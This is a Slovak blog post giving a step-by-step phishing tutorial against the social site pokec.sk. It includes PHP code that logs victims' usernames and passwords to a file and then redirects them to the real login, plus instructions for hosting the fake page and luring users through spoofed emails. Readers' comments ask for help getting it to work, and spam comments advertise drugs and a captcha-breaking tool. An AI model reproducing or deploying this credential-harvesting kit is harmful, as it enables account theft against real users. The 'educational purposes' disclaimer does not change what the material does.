Hackujeme pokec (a množstvo ďalších stránok)
Vitajte. Prvý článok na tomto blogu som sa rozhodol venovať phishingu. Mnohí ste sa s ním už určite stretli. Ak nie, v skratke si ozrejmíme čo to je, a ako sa proti nemu brániť.
Takže čo to phishing vlastne je? Na wikipédií sa môžte dočítať takéto niečo: Phishing (z ang. password fishing – doslova rybárčenie hesiel) označuje činnosť, pri ktorej sa podvodník snaží vylákať od používateľov rôzne heslá, napr. k bankovému účtu. Väčšinou prebieha tak, že sa založí webstránka, ktorá vyzerá ako presná kópia už existujúcej dôveryhodnej stránky. Meno a heslo zadané do phishingovej stránky, sa odošlú podvodníkovi, ktorý ich môže zneužiť.
Ako vlastne taký phishingový útok prebieha? Celé je to veľmi jednoduché. Až tak, že to dokáže takmer každý. Samozrejme s aspoň akými takými počítačovými znalosťami. Vytvorenie podvrhnutej web stránky je jednoduché. Jediný problém je, ako používateľa prinútiť, aby sa cez našu stránku prihlásil. Zvyčajne sa na to používajú e-mailové výzvy akože "od administrátora" ktoré nás vyzývajú na zmenu hesla, či získanie nejakej výhody, ak sa prihlásime cez podvrhnutú stránku. Preto na takéto e-maily nikdy nereagujeme, a vždy ich radšej zmažeme! Dokonca aj podvrhnúť odosielatela e-mailu je strašne jednoduché. Najbližšie si ukážeme ako odoslať mail z adresy napríklad bill.gates@microsoft.com alebo obama@facebook.com
Celé si to môžme predviesť na stránke pokec.sk.
Čo k tomu budeme potrebovať:
- Poznámkový blok (Notepad) - súčasť každého OS
- Webový prehliadač :)
- Program na pripojenie cez ftp (FlashFXP) ale postačí aj prieskumník
- Web priestor - zaregistrujeme sa napríklad na wz.cz
A tu je celý postup:
- Vytvoríme si na disku ľubovolný adresár. Napríklad C:/Phishing
- Teraz si v prehliadači otvoríme stránku pokec.sk . V prehliadači vpravo hore klikneme na Súbor - Uložiť ako - Kompletná webová stránka (V niektorých prehliadačoch je to ako html súbor z obrázkami, alebo nejaký ekvivalent) . Celé to pomenujeme index.html a uložíme do zložky v kroku 1.
- Práve sme si stiahli úvodnú stránku pokec.sk :) Teraz príde na rad jej úprava. Na to potrebujeme pár php skriptov. Napríklad takéto niečo:
<?
if ($submit) {
define ("subor", "logz.txt");
if (file_exists(subor))
{
$soubor=fopen(subor, "a+");
}
else
{
$soubor=fopen(subor, "w");
}
rewind($soubor);
fwrite($soubor," | $meno:$heslo | ");
fclose($soubor);
}
}
?>
<script>
window.location.replace("https://moje.azet.sk/prihlasenie.phtml?KDE=pokec.azet.sk/Miestnost.phtml~");
</script>
Redirect 301 /filewrite.php https://moje.azet.sk/prihlasenie.phtml?KDE=pokec.azet.sk/Miestnost.phtml~
- Celý zvýraznený kód skopírujeme do poznámkového bloku (Notepad) alebo ľubovolného textového editoru, pomenujeme filewrite.php a uložíme do našej zložky
- Teraz v poznámkovom bloku otvoríme súbor index.html. Vidíme že sa tam nachádza hŕba pre nás nezrorumiteľného kódu. Nás bude zaujímať tento riadok:
<form action="https://prihlasenie.azet.sk/overenie?isWap=0&uri=http%3A%2F%2Fpokec.azet.sk%2F" method="post">
Nahradíme ho týmto:
<form action="filewrite.php" method="post">
Súbor už len uložíme a sme hotoví.
5. Naša stránka je už hotová. Celé to teraz uploadneme na web. Ak žiaden nemáme, zaregistrujeme sa napríklad na www.wz.cz . Pre získanie hesla už len stačí užívatela prinútiť, aby sa prihlásil cez našu podstrčenú stránku. To docielime napríklad jej nastavením ako domovskej stránky, alebo e-mailom s výzvou na zmenu hesla a odkazom na našu stránku.
Po odoslaní údajov sa vytvorí súbor logz.txt, ktorý obsahuje všetky zadané užívatelské mená a heslá. That's all.
Tento článok slúži len na edukačné účely a autor nenesie žiadnu zodpovednosť za jeho zneužitie.
Komentáre
Prehľad komentárov
Pression arterielle est comment dur votre sang pousse contre les parois de vos arteres lorsque votre coeur determination pompe le sang. Arteres sont les tubes qui transportent perseverent b gerer offre sang loin de votre coeur. Chaque age votre determination bat, il pompe le sang a tous egards vos arteres a la flanerie de votre corps.
https://www.cialispascherfr24.com/tadalafil-prix-france-gratuit/
Recommendations: how to promote your baltier.estranky.sk
(LatonyaDem, 26. 3. 2018 0:00)
This message is posted here using XRumer + XEvil 4.0
XEvil 4.0 is a revolutionary application that can break any anti-bot protection.
Captcha Recognition Google (ReCaptcha-1, ReCaptcha-2), Facebook, BING, Hotmail, Yahoo,
Yandex, VKontakte, Captcha Com - and over 8400 other types!
You read this - it means it works! ;)
Details on the official website of XEvil, there is a free demo version.
Check YouTube video "XEvil ReCaptcha2"
heslo
(Dabel, 26. 1. 2012 15:44)Draku pomôž všetko som urobil, stranku vytvoril ale keď si to skušam tak by mi malo na presmerovaný mail poslať logz.txt ale nič nechodí. Kde sa stala chyba?
Re: heslo
(trOll, 20. 9. 2013 9:25)pokiaľ som tomu porozumel a to som vychodil len základnú školu aj to som vyšiel z 8.triedy tak ten logz.txt sa vytvorí na na tom spomínanom web priestore a nie že ti príde na e-mail ...
falošná lesbička
(Matys, 24. 12. 2012 20:37)
pokec- to je riadne svinstvo
http://zaujimavosti.net/problemove/sialenstvo-a-zvratenosti-na-pokeci-diel-7-falosne-lesbicky-a-falosne-ucty/
subor logz.txt
(xxl1, 5. 11. 2012 20:34):) pekný článok:) hhmm, teda block. Len nejde nefunguje ten súbor logz.txt. Prečo prosím Ťa??? ... xxl1@azet.sk Díki:)
pokec je hnus
(Juliánek, 13. 7. 2012 8:18)pokec, to je hnus. sa pozrite na toto a staci mi http://zaujimavosti.net/extremne-veci/na-pokeci-tisice-podvodnikov-zvrhlikov-uchylov-a-aj-chudobne-mamicky/
Pomoc
(Denis, 24. 1. 2012 20:46)Ahoj, ja by som sa chcel spýtať, ako mám vlastne nastaviť domovskú stránku na tom wz.cz lebo mi to stále nejak nejde. PLS prosím ďakujem.
pomoc
(anonim, 13. 12. 2011 11:14)prosim ta vedel by si mi nejako pomoct skusal som to presne podla navodu. Poprosim by som kontakt na teba.
What is a sturdy blood power
(Aicetrydrext, 13. 10. 2018 17:53)